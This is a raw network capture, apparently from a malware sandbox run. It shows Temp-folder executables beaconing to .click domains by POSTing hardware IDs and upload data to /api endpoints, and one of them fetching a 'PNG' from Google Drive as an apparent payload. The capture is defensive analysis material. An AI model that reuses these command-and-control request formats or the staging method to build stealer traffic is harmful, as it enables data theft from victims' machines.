{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44b31f9243d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1822&rtt_var=740&sent=322&recv=571&lost=0&retrans=0&sent_bytes=2848&recv_bytes=551958&delivery_rate=1602634&cwnd=208&unsent_bytes=0&cid=ffa0aae83d314013&ts=3818&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49863	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:48 UTC	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=71L99TJFEPMXA Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20410 Host: cheapptaxysu.click
2024-12-22 01:16:48 UTC	15331	OUT	Data Raw: 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46 Data Ascii: --71L99TJFEPMXAContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--71L99TJFEPMXAContent-Disposition: form-data; name="pid"3--71L99TJFEPMXAContent-Disposition: form-data; name="lid"CZJvss--geopoxid--71L99TJF
2024-12-22 01:16:48 UTC	5079	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-22 01:16:49 UTC	1138	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qcmf07jfldfga0r1inf186upkm; expires=Wed, 16 Apr 2025 19:03:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9rdK3IqdBNThBqVbl6x%2BkJmJMeDxcvWNOnC9GTp%2B880chSuiU8lpceiM1tl%2F21%2FwhYVeAgB9O2f%2B2647pSqMR7ZdtesHB%2Fknx5ToYzqRvBw2CKgKdEclNBulOyXeR8Aml0L1d4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44c2cc1e3300-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1954&rtt_var=778&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21458&delivery_rate=1367681&cwnd=236&unsent_bytes=0&cid=8c47e3e67e934ccf&ts=1072&x=0"
2024-12-22 01:16:49 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49867	216.58.208.238	443	2212	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:50 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-22 01:16:51 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sun, 22 Dec 2024 01:16:51 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-K9Rgvju2Wp-EhSZXihfWzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49875	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:50 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: pancakedipyps.click
2024-12-22 01:16:50 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:16:51 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3d6vop707m78spfrh2qtn3pvub; expires=Wed, 16 Apr 2025 19:03:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XsRO81EN7y5TrzU%2By7GPeycZrJYEJrZm9J%2FMZrNMxpk3Z8ORsRhvsYnSwwfGX%2FaqpexSayLVPPZZtTlXnC%2BCnZHy8WAhg%2Fi%2B3ucThlSz3Tc4dvVyKnIqY%2Bh5atgPZvp3HpN2c0V7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44d42fd832ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=984&delivery_rate=1574123&cwnd=242&unsent_bytes=0&cid=9948423b69fe1d16&ts=874&x=0"
2024-12-22 01:16:51 UTC	54	IN	Data Raw: 33 30 0d 0a 37 6b 58 54 6e 75 4e 4c 6c 41 79 36 6b 66 52 6f 4c 39 44 6d 33 57 72 64 5a 54 46 74 77 4b 36 72 63 6b 30 67 4a 48 34 73 4e 6c 65 31 47 41 3d 3d 0d 0a Data Ascii: 307kXTnuNLlAy6kfRoL9Dm3WrdZTFtwK6rck0gJH4sNle1GA==
2024-12-22 01:16:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49876	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:51 UTC	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VSPGA1UD22RELI Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1287 Host: cheapptaxysu.click
2024-12-22 01:16:51 UTC	1287	OUT	Data Raw: 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 56 53 50 47 41 Data Ascii: --VSPGA1UD22RELIContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--VSPGA1UD22RELIContent-Disposition: form-data; name="pid"1--VSPGA1UD22RELIContent-Disposition: form-data; name="lid"CZJvss--geopoxid--VSPGA
2024-12-22 01:16:52 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=acj8atr45hj8h70qemburt0f0t; expires=Wed, 16 Apr 2025 19:03:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxqU94tVVPNzJjVy2ldRdvab6yYjKXDhUGg203nXC5EPHVSCmQGUuseyFagKvM3W6HZbe3MaUG5Oy2PPSqWTDowoQ86TCSk8mnr4rwM6%2Bz%2FM4sH8s4uZKTz2NNHHzPvLYBtHO68%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44d5cdd24381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2181&min_rtt=2174&rtt_var=830&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2291&delivery_rate=1307072&cwnd=211&unsent_bytes=0&cid=ce8073d2c49a0d57&ts=820&x=0"
2024-12-22 01:16:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49874	216.58.208.238	443	4628	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:51 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-22 01:16:52 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sun, 22 Dec 2024 01:16:51 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-3tHuR5-qaEsr6W1XHR76aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49882	142.250.181.65	443	2212	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:53 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-22 01:16:56 UTC	4919	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6b8vlAhRM6BhjO-qvG7XegibYD7_vuY58QsOY3NmcR6H74rTBRpJbUPZGCud5y6TkbAvfcvQc Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT Date: Sun, 22 Dec 2024 01:16:55 GMT Expires: Sun, 22 Dec 2024 01:16:55 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-22 01:16:56 UTC	4919	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-22 01:16:56 UTC	4864	IN	Data Raw: aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 bb 10 1f aa Data Ascii: L%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-22 01:16:56 UTC	1320	IN	Data Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: bc b8 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: 62 3d fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a Data Ascii: b=v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: f8 29 d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be Data Ascii: )f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: e6 8b 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2y
